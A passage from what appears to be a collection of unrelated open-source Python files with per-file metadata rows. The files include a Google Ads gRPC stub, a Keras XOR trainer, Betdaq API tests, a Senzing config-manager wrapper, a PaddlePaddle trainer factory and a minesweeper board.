request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.GetFeedItemTargetRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_resources_dot_feed__item__target__pb2.FeedItemTarget.SerializeToString,
),
'MutateFeedItemTargets': grpc.unary_unary_rpc_method_handler(
servicer.MutateFeedItemTargets,
request_deserializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2.MutateFeedItemTargetsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v2.services.FeedItemTargetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
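
# --- Illustrative usage sketch (not part of the generated code above) ---
# A minimal sketch of driving the generated stub; the channel target and
# resource name are caller-supplied placeholders, and real Google Ads calls
# additionally require OAuth2 credentials and request metadata not shown here.
def _example_get_feed_item_target(channel, resource_name):
  _svc_pb2 = google_dot_ads_dot_googleads__v2_dot_proto_dot_services_dot_feed__item__target__service__pb2
  stub = FeedItemTargetServiceStub(channel)
  # resource_name is assumed to look like 'customers/{cid}/feedItemTargets/{...}'.
  request = _svc_pb2.GetFeedItemTargetRequest(resource_name=resource_name)
  return stub.GetFeedItemTarget(request)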
| 50.826087 | 176 | 0.823211 | ["Apache-2.0"] | BenRKarl/google-ads-python | google/ads/google_ads/v2/proto/services/feed_item_target_service_pb2_grpc.py | 3,507 | Python |
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Default module to train a xor classifier and write weights to disk."""
from keras.models import Sequential
from keras.layers.core import Dense, Activation
import keras.optimizers as kop
import numpy as np
import os
from sklearn.preprocessing import StandardScaler
try:
import cPickle as pickle
except Exception as ex:
import pickle
def check_dir_exists(dirname='./pickles'):
"""Check if given dirname exists This will contain all the pickle files."""
if not os.path.exists(dirname):
print("Directory to store pickes does not exist. Creating one now: ./pickles")
os.mkdir(dirname)
def save_x_y_scalar(X_train, Y_train):
"""Use a normalization method on your current dataset and save the coefficients.
Args:
X_train: Input X_train
        Y_train: Labels Y_train
    Returns:
        Normalized X_train, Y_train (currently using StandardScaler from scikit-learn)
"""
scalar_x = StandardScaler()
X_train = scalar_x.fit_transform(X_train)
scalar_y = StandardScaler()
Y_train = scalar_y.fit_transform(Y_train)
print('dumping StandardScaler objects ..')
pickle.dump(scalar_y,
open('pickles/scalar_y.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
pickle.dump(scalar_x,
open('pickles/scalar_x.pickle', "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
return X_train, Y_train
def create_model(X_train, Y_train):
"""create_model will create a very simple neural net model and save the weights in a predefined directory.
Args:
X_train: Input X_train
        Y_train: Labels Y_train
"""
xin = X_train.shape[1]
model = Sequential()
model.add(Dense(units=4, input_shape=(xin, )))
model.add(Activation('tanh'))
model.add(Dense(4))
model.add(Activation('linear'))
model.add(Dense(1))
rms = kop.RMSprop()
print('compiling now..')
model.compile(loss='mse', optimizer=rms)
model.fit(X_train, Y_train, epochs=1000, batch_size=1, verbose=2)
score = model.evaluate(X_train, Y_train, batch_size=1)
print("Evaluation results:", score)
open('pickles/my_model_architecture.json', 'w').write(model.to_json())
print("Saving weights in: ./pickles/my_model_weights.h5")
model.save_weights('pickles/my_model_weights.h5')
if __name__ == '__main__':
X_train = np.array([[1., 1.], [1., 0], [0, 1.], [0, 0]])
Y_train = np.array([[0.], [1.], [1.], [0.]])
check_dir_exists(dirname='./pickles')
X_train, Y_train = save_x_y_scalar(X_train, Y_train)
create_model(X_train, Y_train)
| 31.05814 | 111 | 0.671659 | ["MIT"] | ansrivas/keras-rest-server | createpickles.py | 2,671 | Python |
from __future__ import absolute_import, unicode_literals
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import TemplateView
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', TemplateView.as_view(template_name='base.html'), name='home'),
]
| 29.272727 | 76 | 0.76087 | ["BSD-3-Clause"] | JostCrow/django-maintenance-window | tests/urls.py | 322 | Python |
import datetime
import unittest
import unittest.mock as mock
from betdaq.apiclient import APIClient
from betdaq.endpoints.account import Account
class AccountTest(unittest.TestCase):
def setUp(self):
client = APIClient('username', 'password')
self.account = Account(client)
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_get_account_balances(self, mock_request, mock_process_response):
self.account.get_account_balances()
mock_request.assert_called_once_with('GetAccountBalances', {}, secure=True)
assert mock_process_response.call_count == 1
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_get_account_transactions(self, mock_request, mock_process_response):
self.account.get_account_transactions(StartTime=datetime.datetime(2017, 1, 1).timestamp(),
EndTime=datetime.datetime(2017, 1, 10).timestamp())
mock_request.assert_called_once_with(
'ListAccountPostings', {'StartTime': 1483228800.0, 'EndTime': 1484006400.0}, secure=True
)
assert mock_process_response.call_count == 1
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_get_account_transactions_by_id(self, mock_request, mock_process_response):
self.account.get_account_transactions_by_id(TransactionId=1)
mock_request.assert_called_once_with('ListAccountPostingsById', {'TransactionId': 1}, secure=True)
assert mock_process_response.call_count == 1
@mock.patch('betdaq.endpoints.account.Account.process_response')
@mock.patch('betdaq.endpoints.account.Account.request', return_value=mock.Mock())
def test_change_account_password(self, mock_request, mock_process_response):
self.account.change_account_password(Password='new_password')
mock_request.assert_called_once_with('ChangePassword', {'Password': 'new_password'}, secure=True)
assert mock_process_response.call_count == 1
| 46.04 | 106 | 0.742398 | ["MIT"] | ScoreX/betdaq | tests/test_account.py | 2,302 | Python |
from brownie import *
from helpers.constants import AddressZero
from helpers.registry import registry
from dotmap import DotMap
def connect_gnosis_safe(address):
return Contract.from_abi(
"GnosisSafe", address, registry.gnosis_safe.artifacts.GnosisSafe["abi"],
)
class GnosisSafeSystem:
def __init__(self):
self.masterCopy = Contract.from_abi(
"GnosisSafe",
web3.toChecksumAddress(registry.gnosis_safe.addresses.masterCopy),
registry.gnosis_safe.artifacts.GnosisSafe["abi"],
)
self.proxyFactory = Contract.from_abi(
"ProxyFactory",
web3.toChecksumAddress(registry.gnosis_safe.addresses.proxyFactory),
registry.gnosis_safe.artifacts.ProxyFactory["abi"],
)
def deployGnosisSafe(self, params, signer):
encodedParams = self.masterCopy.setup.encode_input(
params.owners,
params.threshold,
params.to,
params.data,
params.fallbackHandler,
params.paymentToken,
params.payment,
params.paymentReceiver,
)
tx = self.proxyFactory.createProxy(
self.masterCopy, encodedParams, {"from": signer}
)
return Contract.from_abi(
"GnosisSafe",
tx.events["ProxyCreation"][0]["proxy"],
registry.gnosis_safe.artifacts.GnosisSafe["abi"],
)
| 30.041667 | 80 | 0.627601 | ["MIT"] | EchoDao-BSC/badger-system | scripts/systems/gnosis_safe_system.py | 1,442 | Python |
from ctypes import *
import threading
import json
import os
import arcpy
class MyBuffer(threading.local):
def __init__(self):
self.buf = create_string_buffer(65535)
self.bufSize = sizeof(self.buf)
#arcpy.AddMessage("Created new Buffer {}".format(self.buf))
tls_var = MyBuffer()
from .G2Exception import TranslateG2ModuleException, G2ModuleNotInitialized, G2ModuleGenericException
def resize_return_buffer(buf_, size_):
""" callback function that resizes return buffer when it is too small
Args:
size_: size the return buffer needs to be
"""
try:
if not tls_var.buf:
#arcpy.AddMessage("New RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
elif (tls_var.bufSize < size_):
#arcpy.AddMessage("RESIZE_RETURN_BUF {}:{}/{}".format(buf_,size_,tls_var.bufSize))
foo = tls_var.buf
tls_var.buf = create_string_buffer(size_)
tls_var.bufSize = size_
memmove(tls_var.buf, foo, sizeof(foo))
except AttributeError:
#arcpy.AddMessage("AttributeError RESIZE_RETURN_BUF {}:{}".format(buf_,size_))
tls_var.buf = create_string_buffer(size_)
#arcpy.AddMessage("Created new Buffer {}".format(tls_var.buf))
tls_var.bufSize = size_
return addressof(tls_var.buf)
class G2ConfigMgr(object):
"""G2 config-manager module access library
Attributes:
        _lib_handle: Handle to the loaded native G2 library.
        _resize_func_def: resize function definition
_resize_func: resize function pointer
_module_name: CME module name
_ini_params: a JSON string containing INI parameters
"""
def initV2(self, module_name_, ini_params_, debug_=False):
""" Initializes the G2 config manager
This should only be called once per process.
Args:
moduleName: A short name given to this instance of the config module
iniParams: A json document that contains G2 system parameters.
            verboseLogging: Enable diagnostic logging, which writes a large amount of diagnostic information to the log output
"""
self._module_name = self.prepareStringArgument(module_name_)
self._ini_params = self.prepareStringArgument(ini_params_)
self._debug = debug_
if self._debug:
arcpy.AddMessage("Initializing G2 Config Manager")
self._lib_handle.G2ConfigMgr_init_V2.argtypes = [c_char_p, c_char_p, c_int]
ret_code = self._lib_handle.G2ConfigMgr_init_V2(self._module_name,
self._ini_params,
self._debug)
if self._debug:
arcpy.AddMessage("Initialization Status: " + str(ret_code))
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def __init__(self):
# type: () -> None
""" Class initialization
"""
try:
if os.name == 'nt':
self._lib_handle = cdll.LoadLibrary("G2.dll")
else:
self._lib_handle = cdll.LoadLibrary("libG2.so")
except OSError as ex:
arcpy.AddMessage("ERROR: Unable to load G2. Did you remember to setup your environment by sourcing the setupEnv file?")
arcpy.AddMessage("ERROR: For more information see https://senzing.zendesk.com/hc/en-us/articles/115002408867-Introduction-G2-Quickstart")
arcpy.AddMessage("ERROR: If you are running Ubuntu or Debian please also review the ssl and crypto information at https://senzing.zendesk.com/hc/en-us/articles/115010259947-System-Requirements")
raise G2ModuleGenericException("Failed to load the G2 library")
self._resize_func_def = CFUNCTYPE(c_char_p, c_char_p, c_size_t)
self._resize_func = self._resize_func_def(resize_return_buffer)
def prepareStringArgument(self, stringToPrepare):
# type: (str) -> str
""" Internal processing function """
#handle null string
if stringToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(stringToPrepare) == str:
return stringToPrepare.encode('utf-8')
        # if input is a bytearray, assume utf-8 and convert to str
elif type(stringToPrepare) == bytearray:
return stringToPrepare.decode().encode('utf-8')
elif type(stringToPrepare) == bytes:
return str(stringToPrepare).encode('utf-8')
#input is already a str
return stringToPrepare
def prepareIntArgument(self, valueToPrepare):
# type: (str) -> int
""" Internal processing function """
""" This converts many types of values to an integer """
#handle null string
if valueToPrepare == None:
return None
#if string is unicode, transcode to utf-8 str
if type(valueToPrepare) == str:
return int(valueToPrepare.encode('utf-8'))
        # if input is a bytearray, assume utf-8 and convert to str
elif type(valueToPrepare) == bytearray:
return int(valueToPrepare)
elif type(valueToPrepare) == bytes:
return int(valueToPrepare)
#input is already an int
return valueToPrepare
def addConfig(self, configStr, configComments, configID):
""" registers a new configuration document in the datastore
"""
_configStr = self.prepareStringArgument(configStr)
_configComments = self.prepareStringArgument(configComments)
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_addConfig.argtypes = [c_char_p, c_char_p, POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_addConfig.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_addConfig(_configStr,_configComments,cID)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
configID += (str(cID.value).encode())
def getConfig(self,configID,response):
""" retrieves the registered configuration document from the datastore
"""
configID_ = self.prepareIntArgument(configID)
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfig.restype = c_int
self._lib_handle.G2ConfigMgr_getConfig.argtypes = [c_longlong, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfig(configID_,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def getConfigList(self,response):
""" retrieves a list of known configurations from the datastore
"""
response[::]=b''
responseBuf = c_char_p(addressof(tls_var.buf))
responseSize = c_size_t(tls_var.bufSize)
self._lib_handle.G2ConfigMgr_getConfigList.restype = c_int
self._lib_handle.G2ConfigMgr_getConfigList.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2ConfigMgr_getConfigList(
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
#Add the bytes to the response bytearray from calling function
response += tls_var.buf.value
def setDefaultConfigID(self,configID):
""" sets the default config identifier in the datastore
"""
configID_ = self.prepareIntArgument(configID)
self._lib_handle.G2ConfigMgr_setDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_setDefaultConfigID.argtypes = [c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_setDefaultConfigID(configID_)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def replaceDefaultConfigID(self,oldConfigID,newConfigID):
""" sets the default config identifier in the datastore
"""
oldConfigID_ = self.prepareIntArgument(oldConfigID)
newConfigID_ = self.prepareIntArgument(newConfigID)
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.restype = c_int
self._lib_handle.G2ConfigMgr_replaceDefaultConfigID.argtypes = [c_longlong,c_longlong]
ret_code = self._lib_handle.G2ConfigMgr_replaceDefaultConfigID(oldConfigID_,newConfigID_)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
def getDefaultConfigID(self, configID):
""" gets the default config identifier from the datastore
"""
configID[::]=b''
cID = c_longlong(0)
self._lib_handle.G2ConfigMgr_getDefaultConfigID.argtypes = [POINTER(c_longlong)]
self._lib_handle.G2ConfigMgr_getDefaultConfigID.restype = c_int
ret_code = self._lib_handle.G2ConfigMgr_getDefaultConfigID(cID)
if ret_code == -1:
raise G2ModuleNotInitialized('G2ConfigMgr has not been succesfully initialized')
elif ret_code < 0:
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
if cID.value:
configID += (str(cID.value).encode())
def clearLastException(self):
""" Clears the last exception
"""
self._lib_handle.G2ConfigMgr_clearLastException.restype = None
self._lib_handle.G2ConfigMgr_clearLastException.argtypes = []
self._lib_handle.G2ConfigMgr_clearLastException()
def getLastException(self):
""" Gets the last exception
"""
self._lib_handle.G2ConfigMgr_getLastException.restype = c_int
self._lib_handle.G2ConfigMgr_getLastException.argtypes = [c_char_p, c_size_t]
self._lib_handle.G2ConfigMgr_getLastException(tls_var.buf,sizeof(tls_var.buf))
resultString = tls_var.buf.value.decode('utf-8')
return resultString
def getLastExceptionCode(self):
""" Gets the last exception code
"""
self._lib_handle.G2ConfigMgr_getLastExceptionCode.restype = c_int
self._lib_handle.G2ConfigMgr_getLastExceptionCode.argtypes = []
exception_code = self._lib_handle.G2ConfigMgr_getLastExceptionCode()
return exception_code
def destroy(self):
""" Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
"""
self._lib_handle.G2ConfigMgr_destroy()
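
# --- Illustrative usage sketch (not part of the SDK module above) ---
# A minimal sketch of the call sequence this class expects, assuming the
# Senzing native library is installed and `engine_settings` holds valid
# engine configuration JSON; the default value below is only a placeholder.
def _example_config_mgr_usage(engine_settings='{"PIPELINE": {}, "SQL": {}}'):
    config_mgr = G2ConfigMgr()
    config_mgr.initV2("exampleConfigMgr", engine_settings)
    default_id = bytearray()
    config_mgr.getDefaultConfigID(default_id)   # e.g. bytearray(b'2049...')
    config_doc = bytearray()
    if default_id:
        config_mgr.getConfig(default_id.decode(), config_doc)
    config_mgr.destroy()
    return config_doc.decode() if config_doc else None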
| 43.196552 | 204 | 0.662808 | ["MIT"] | GeoJamesJones/ArcGIS-Senzing-Prototype | senzing/g2/sdk/python/G2ConfigMgr.py | 12,527 | Python |
start_num = int(input())
end_num = int(input())
prime_nums = []
for num in range(start_num, end_num + 1):
if num > 1:
for i in range(2, num//2+1):
if num % i == 0:
break
else:
prime_nums.append(num)
print(' '.join(map(str, prime_nums)) + ' ')
print(f'The total number of prime numbers between {start_num} to {end_num} is {len(prime_nums)}')
| 22.555556 | 97 | 0.564039 | ["MIT"] | elenaborisova/Softuniada-Competition | softuniada_2021/01_easter_prize.py | 406 | Python |
class Node:
""" A singly-linked node. """
def __init__(self, data=None):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__ (self):
self.tail = None
self.head = None
def append(self, data):
node = Node(data)
if self.head:
self.head.next = node
self.head = node
else:
self.tail = node
self.head = node
words = SinglyLinkedList()
words.append('egg')
words.append('ham')
words.append('spam')
current = words.tail
while current:
print(current.data)
current = current.next
| 20.375 | 34 | 0.542945 | ["MIT"] | PacktPublishing/Data-Structures-and-Algorithms-with-Python-Third-Edition | Chapter04/faster_append_singly_linked_list.py | 652 | Python |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
from paddle.fluid.log_helper import get_logger
local_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer, HeterXpuTrainer, PSGPUTrainer
from .device_worker import Hogwild, DownpourSGD, Section, DownpourSGDOPT
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if not opt_info:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info.get("trainer", "MultiTrainer")
device_worker_class = opt_info.get("device_worker", "Hogwild")
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
# for debug tools
if opt_info is not None:
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None and len(
opt_info.get("dump_fields")) != 0:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None and len(
opt_info.get("dump_fields_path")) != 0:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("dump_param") is not None and len(
opt_info.get("dump_param")) != 0:
trainer._set_dump_param(opt_info["dump_param"])
if opt_info.get("worker_places") is not None:
trainer._set_worker_places(opt_info["worker_places"])
if opt_info.get("use_ps_gpu") is not None:
trainer._set_use_ps_gpu(opt_info["use_ps_gpu"])
if opt_info.get("enable_random_dump") is not None:
trainer._set_enable_random_dump(opt_info[
"enable_random_dump"])
if opt_info.get("dump_interval") is not None:
trainer._set_dump_interval(opt_info["dump_interval"])
if opt_info.get("random_with_lineid") is not None:
trainer._set_random_with_lineid(opt_info[
"random_with_lineid"])
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("loss_names") is not None:
trainer._set_loss_names(opt_info["loss_names"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
    Definition of the FetchHandlerMonitor class;
    it runs a fetch handler periodically in a background thread.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
local_logger.warning("the value of {} is not a Variable".format(
key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
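
# --- Illustrative usage sketch (not part of the Paddle module above) ---
# A minimal sketch of how these helpers are typically wired together, assuming
# a Paddle build; `scope` would normally be fluid.global_scope() and `handler`
# a FetchHandler-style object exposing period_secs, var_dict and handler().
def _example_trainer_and_monitor(scope, handler, opt_info=None):
    trainer = TrainerFactory()._create_trainer(opt_info)  # MultiTrainer + Hogwild by default
    monitor = FetchHandlerMonitor(scope, handler)
    monitor.start()   # polls the fetched variables every handler.period_secs seconds
    # ... run training with `trainer` here ...
    monitor.stop()
    return trainer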
| 43.789744 | 104 | 0.574072 | ["Apache-2.0"] | 0x45f/Paddle | python/paddle/fluid/trainer_factory.py | 8,539 | Python |
# https://en.m.wikipedia.org/wiki/Box_Drawing
from random import randrange
class Board:
    # update_board() is the main method used outside this class; find_valid_starting_mine_board(),
    # check_winning() and reveal_board() are also part of the public interface.
def __init__(self, size, mine_numbers):
self.size = size
self.default_content = " ◌ "
self.board_data = self.create_board(self.size)
self.mine_numbers = mine_numbers
def create_board(self, size):
return [[self.default_content for x in range(self.size)] for y in range(self.size)]
def internal_board(self):
internal_board = ""
for x in range(len(self.board_data)):
drawn_line = ""
for y in range(len(self.board_data)):
drawn_line += self.board_data[x][y]
if y != len(self.board_data) - 1:
drawn_line += "│"
internal_board += drawn_line + "\n"
if x < len(self.board_data) - 1:
internal_board += "───┼" * \
(len(self.board_data) - 1) + "───" + "\n"
return internal_board
def draw_board(self):
internal_board = self.internal_board()
drawn_board = ""
# drawing the boarder around the internal board
internal_board = internal_board.split("\n")
drawn_board += "╔═══" + "╤═══" * (self.size - 1) + "╗" + "\n"
for x in range(0, self.size * 2, 2):
drawn_board += "║" + \
internal_board[x] + "║" + f" :{int(x/2 +1)}" + "\n"
if x != (self.size * 2) - 2:
drawn_board += "╟" + internal_board[x + 1] + "╢" + "\n"
drawn_board += "╚═══" + "╧═══" * (self.size - 1) + "╝" + "\n"
for x in range(self.size):
number = x + 1
if number < 10:
drawn_board += f" {number} "
else:
drawn_board += f" {number}"
return drawn_board
def generate_mines(self):
mine_list = []
while len(mine_list) < self.mine_numbers:
x = randrange(self.size)
y = randrange(self.size)
if (x, y) not in mine_list:
mine_list.append((x, y))
return mine_list
def generate_mine_board(self):
mine_list = self.generate_mines()
mine_board = ([[0 for y in range(self.size)] for x in range(self.size)])
for mine in mine_list:
            # place a mine at this position and add 1 to all adjacent cells
x = mine[0]
y = mine[1]
mine_board[y][x] = "◉" # negative = mine
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size and mine_board[y_][x_] != "◉":
mine_board[y_][x_] += 1
return mine_board
def find_valid_starting_mine_board(self, x, y):
        # make sure the first revealed cell (x, y) has no adjacent mines
mine_board_candidate = []
while True:
mine_board_candidate = self.generate_mine_board()
if mine_board_candidate[y - 1][x - 1] == 0:
print(mine_board_candidate)
break
self.mine_board = mine_board_candidate
def flood_fill(self, x, y):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == "◉":
raise Exception("the flood fill algo hit a mine, but it shouldn't because it will stop when it hits a number.")
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
elif self.board_data[y][x] == " ◌ " and self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
for x_ in range(x - 1, x + 2):
for y_ in range(y - 1, y + 2):
if 0 <= x_ < self.size and 0 <= y_ < self.size:
self.flood_fill(x_, y_)
def reveal_board(self):
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] in [" ◌ ", " ▶ "]:
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
elif self.mine_board[y][x] == 0:
self.board_data[y][x] = " "
elif self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
return self.draw_board()
def check_winning(self):
flag = True
for x in range(self.size):
for y in range(self.size):
if self.board_data[y][x] == " ◌ " and self.mine_board[y][x] != "◉":
flag = False
return flag
def update_board(self, position, flag=False):
"""Takes position [x,y] as input
returns a updated board as a string
"""
x = position[0] - 1
y = position[1] - 1
if flag == True:
if self.board_data[y][x] == " ◌ ":
self.board_data[y][x] = " ▶ "
elif self.board_data[y][x] == " ▶ ":
self.board_data[y][x] = " ◌ "
return self.draw_board()
if self.mine_board[y][x] == "◉":
self.board_data[y][x] = " ◉ "
return False
elif isinstance(self.mine_board[y][x], int) and self.mine_board[y][x] > 0:
self.board_data[y][x] = " " + str(self.mine_board[y][x]) + " "
else:
self.flood_fill(x, y)
return self.draw_board()
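
# --- Illustrative usage sketch (not part of the original module) ---
# A minimal demo of the Board class above, assuming a 5x5 board with 3 mines;
# find_valid_starting_mine_board() forces the first reveal onto a cell with
# no adjacent mines (it also prints the raw mine board via the debug print above).
if __name__ == "__main__":
    demo = Board(5, 3)
    demo.find_valid_starting_mine_board(1, 1)
    print(demo.update_board([1, 1]))              # reveal column 1, row 1
    print(demo.update_board([5, 5], flag=True))   # toggle a flag marker
    print("cleared:", demo.check_winning())
    print(demo.reveal_board())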
| 29.625 | 114 | 0.604486 | ["MIT"] | Epirius/minesweeper | board.py | 4,601 | Python |
import iris
from iris.experimental.ugrid import PARSE_UGRID_ON_LOAD
import geovista as gv
fname = "./qrclim.sst.ugrid.nc"
with PARSE_UGRID_ON_LOAD.context():
cube = iris.load_cube(fname)[0]
face_node = cube.mesh.face_node_connectivity
indices = face_node.indices_by_location()
lons, lats = cube.mesh.node_coords
mesh = gv.Transform.from_unstructured(
lons.points,
lats.points,
indices,
data=cube.data,
start_index=face_node.start_index,
name=cube.name(),
)
plotter = gv.GeoPlotter()
sargs = dict(title=f"{cube.name()} / {cube.units}")
plotter.add_mesh(mesh, cmap="balance", show_edges=False, scalar_bar_args=sargs)
plotter.add_coastlines(resolution="10m", color="white")
plotter.add_axes()
plotter.add_text(
